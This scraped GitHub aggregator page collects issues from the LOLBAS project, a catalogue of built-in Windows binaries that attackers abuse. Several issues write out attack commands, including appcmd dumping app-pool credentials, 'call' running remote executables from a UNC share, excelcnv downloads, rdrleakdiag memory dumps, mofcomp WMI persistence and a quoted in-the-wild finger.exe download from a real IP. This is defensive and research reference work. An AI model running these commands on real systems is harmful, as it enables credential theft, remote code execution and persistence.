lolbas-project / lolbas Goto Github PK
View Code? Open in Web Editor NEWLiving Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Home Page: https://lolbas-project.github.io
License: GNU General Public License v3.0
Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Home Page: https://lolbas-project.github.io
License: GNU General Public License v3.0
%windir%\system32\inetsrv\appcmd list apppool /config /xml > c:\apppools.xml
Can leak app pool identity credentials, if allowed to run appcmd and IIS has apppools configured as SpecificUser
example of the output:
Not sure if this would be a fit for this project.
Is there a way to non-interactively download a file with ftp.exe ?
https://lolbas-project.github.io/lolbas/Binaries/Rasautou/
rasautou -d powershell.dll -p powershell -a a -e e
The -p parameter is an arbitrary export. For example:
rasautou -d powershell.dll -p lolbas -a a -e e
As long as the export from the -p parameter exists in "powershell.dll", rasautou will execute it.
Missing Lolbins
esentutl.exe (https://twitter.com/egre55/status/987037150108684288)
SystemSettings.exe (http://www.hexacorn.com/blog/2018/08/12/systemsettings-exe-yet-another-lolbin-for-loading-dlls/)
PrintDialog.exe (http://www.hexacorn.com/blog/2018/08/11/printdialog-exe-yet-another-lolbin-for-loading-dlls/)
Hello, userinit.exe which is built into Windows has been used in a living off the land attack (Astaroth).
Astaroth attack:
https://securityintelligence.com/news/astaroth-attack-infects-windows-machines-via-living-off-the-land-techniques/
Backdoor installed with userinit.exe detected by Trend Micro.
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Backdoor.Win32.SIMDA.C003X3KQ19/
Currently the search only checks for binary names. It would be helpful to search the category name as well. If that's not possible, I would argue that category search is more useful than binary name.
Add a guid field on every yaml file, making sure every one has a unique identifier.
Can use new-guid in powershell for instance...
Management script does not handle conversion of files with multiple . in the name. Example: Microsoft.Workflow.compiler.exe.
Hello
Will this awesome project be updating soon the technique ID field to distinguish if it is mapped to V6 (legacy) or V7 (current) of the ATT&CK Enterprise matrix?
I was looking at your repo for MpCmdRun, and I noticed one of the cited techniques is T1105
You can see below the tool I am using allows for querying both the enterprise-legacy and current version of the enterprise matrix.
I just wanted to integrate your project into the tool I am using and need to know how to reliably afford myself and everyone using my tool an accurate representation of which version of the matrix a technique cited in your repo for the LOLBAS is intended for.
Happy to help too :)
Add links to reports showing usage in the wild
Add information about detection
call is used to "call one batch program from another", but has some interesting properties when combined with UNC paths.
It can be used to send hashes to a Responder listener, much like you would do with net.exe, because it authenticates with SMB (like all UNC paths)
More importantly, it also functions as a convenient download and execute for .bat, .js., .exe, etc. hosted on remote systems.
call \\192.168.1.28\share\test4.exe
call \\192.168.1.28\share\test2.js
I didn't see anything else in the repo source or other issues about call. Searching the wider Internet is a little difficult as the generic name makes it hard to search for. I have 0 idea if it can be used for whitelist bypasses etc.
https://lolbas-project.github.io/ is generating the following error when I try to access the url via Firefox 84.0.2
Secure Connection Failed
An error occurred during a connection to lolbas-project.github.io. SSL received a record that exceeded the maximum permissible length.
Error code: SSL_ERROR_RX_RECORD_TOO_LONG
The page you are trying to view cannot be shown because the authenticity of the received data could not be verified.
Please contact the website owners to inform them of this problem.
Please add mofcomp.exe (Compile, Execution)
Event Triggered Execution: Windows Management Instrumentation Event Subscription (T1546.003)
mofcomp.exe can be used to establish WMI Event Subscription persistence mechanisms configured from a .mof/.bmof file.
Example:
iisstt.dat
This BMOF-file contains malicious VBS-script
mofcomp.exe iisstt.dat
As a result, this script is injected in WMI repository and runs every day 23:00
Add information about the privileges required.
For instance, does it require admin access or not.
Regasm: "RegisterClass" requires local administrator, "UnRegisterClass" (regasm.exe /U) requires user level privileges.
https://lolbas-project.github.io/lolbas/Binaries/Regasm/
Regsvcs: "RegisterClass" requires local administrator, you cannot abuse Regsvcs with user level privileges as far as I know.
https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/
Mostly creating this issue to remind myself to fix this as we're being referenced by MITRE and other reputable organizations.
When a new file is created or an existing is changed in the LOLBAS YML folder there should be some kind of automation that copies this files over to the other repo so that changes are reflected in the web portal.
please add wuauclt.exe exec and download. ๐
How we can perform whole attacks simulation by using lol bins ??
I have tried many of lolbins topics still now nothing is with the use of LOLBINS
Do you have any link that can show us any Simulation so that I will perform it and understand the LOLBINS working.
Ability to search on the Mitre Txxx tecniques on the main page.
Create management scripts for generating MD files from the yaml files.
Specific tags/labeling for specific capability caveats, for example a App Whitelist bypass that works on AppLocker & Solidcore could cary tags for each product
It states Windows client operating systems, but it is only on servers
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz
Hello All,
Thank you for this project.
Is there a way to export the entire list & content of LOLBins to a spreadsheet ?
Best Regards
Source: https://twitter.com/Hexacorn/status/1396536863498907654
C:\Program Files*\Microsoft Office\root\Office*\excelcnv.exe accepts URL so you can use it as a downloader
excelcnv.exe -oice
caveat? your download will be saved as an XLSX and binary data will be stored encoded with UTF8 inside xl\sharedStrings.xml
Also from https://gist.github.com/AhnSeongHyun/3372088:
Word:
"C:\Program Files\Microsoft Office\Office12\wordconv.exe" -oice -nmeExcel:
"C:\Program Files\Microsoft Office\Office12\excelcnv.exe" -oicePowerPoint:
"C:\Program Files\Microsoft Office\Office12\ppcnvcom.exe" -oice์) PPCNVCOM.EXE -oice C:\b.ppt C:\b.pptx
Note that it appears to do preprocessing, so the payload may need to be base64 encoded to ensure it's not modified
rdrleakdiag.exe /p <pid> /o <outputdir> /fullmemdmp /wait 1
Source: https://twitter.com/0gtweet/status/1299071304805560321?s=21
split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s <inf_file>; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf [ ] Provide the project in DB format (sqlite)
Add verified OS version / build on the different commands
Alternate data streams should be T1096
Technique: T1130 Install Root Certificate should be added. ref:https://www.vmray.com/analyses/hancitor-malspam-analysis/report/overview.html
Remove this: https://lolbas-project.github.io/lolbas/Scripts/Slmgr/
And the COM example on this:
https://lolbas-project.github.io/lolbas/Scripts/Winrm/
Note: Use the XML, not the bulleted list towards the top of the following page.
Was testing this out today, but wasn't able to get mshta to cooperate. If I inject an HTA into an ADS for some file "C:\ADS\file.txt"
type bad.hta > C:\ADS\file.txt:bad.hta
and try to execute with
mshta.exe "C:\ADS\file.txt:bad.hta"
I get a big white window, which I believe is an indication that mshta can't find the HTA. I'm currently testing on Version 1903. Do we know if mshta can still read from an ADS? Or am I missing something crucial?
What are thoughts on people doing pull requests to update the yml files to specific Mitre sub-techniques when they're relevant?
For example, in At.yml, update this:
MitreID: T1053
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
to this:
MitreID: T1053.002
MitreLink: https://attack.mitre.org/techniques/T1053/002/
Map binary to the mitre att&ck framework.
Categories must be linked to the different commands.
Example of a file that has multiple categories.
https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS-Project.github.io/master/_lolbas/Binaries/Bitsadmin.md
Hi,
I'm trying to reproduce msdt.exe execution but I'm unable to :\
First issue was with the xml file, on my pc only the UTF-8 is accepted, the utf-16 doesn't, working version below:
<?xml version="1.0" encoding="UTF-8"?>
<Answers Version="1.0">
<Interaction ID="IT_LaunchMethod">
<Value>ContextMenu</Value>
</Interaction>
<Interaction ID="IT_SelectProgram">
<Value>NotListed</Value>
</Interaction>
<Interaction ID="IT_BrowseForFile">
<Value>C:\poc.exe</Value>
</Interaction>
</Answers>
Even after changing the xml the executable is not run automatically but requires additional user interaction, is it the correct behavior?
I'm running windows 10.0.18363 Build 18363
Thanks and keep rocking!
Create the CONTRIBUTION file and add "rules" for contributing.
I want to scrape just the list of binary names (eg 'schtasks.exe'). I can either scrape the list on the site or parse thru all the yml files. Is there a consolidated list that would make it easier? Thanks!
https://twitter.com/bigmacjpg/status/1349727699863011328
@bigmacjpg
https://virustotal.com/gui/file/321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67/detection
ITW maldoc using finger.exe to download 2nd stage. Runs 'finger nc20@184[.]164[.]146[.]102' to pull down b64 encoded cert, certutil to decode, runs payload. Payload is https://virustotal.com/gui/file/2722583e6895d6d1d1a3c7baad1090fb8e9395ee5fb58c4e035a1ee8a54751bd/details.
There is a technique listed here:
https://lolbas-project.github.io/lolbas/Binaries/Rundll32/
rundll32.exe -sta {CLSID}
but I don't see one for:
dllhost /Processid:{CLSID}
I've read the instructions for making a submission but figured I should ask if it makes sense to add this, lol. Thanks.
The Detection section of the Atbroker page is incorrect.
It says:
Detection:
Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
This line is incorrect:
Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
Correct:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
As per the linked resources:
With Windows 8 Microsoft introduced a way to register third-party Assistive Technology applications on the system. All of them are stored inside the Registry under the following branch:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.
https://inventory.rawsec.ml/resources.html#LOLBAS
An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.
More details about features here.
Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.
Mainly because this is giving visibility to your tool, more and more people are using the Rawsec's CyberSecurity Inventory, this helps them find what they need.
The badge shows to your community that your are inventoried. This also shows you care about your project and want it growing, that your tool is not an abandonware.
Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.
If you want to thank us, you can help make the project better known by tweeting about it! For example:
That's all, this message is just to notify you if you care.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.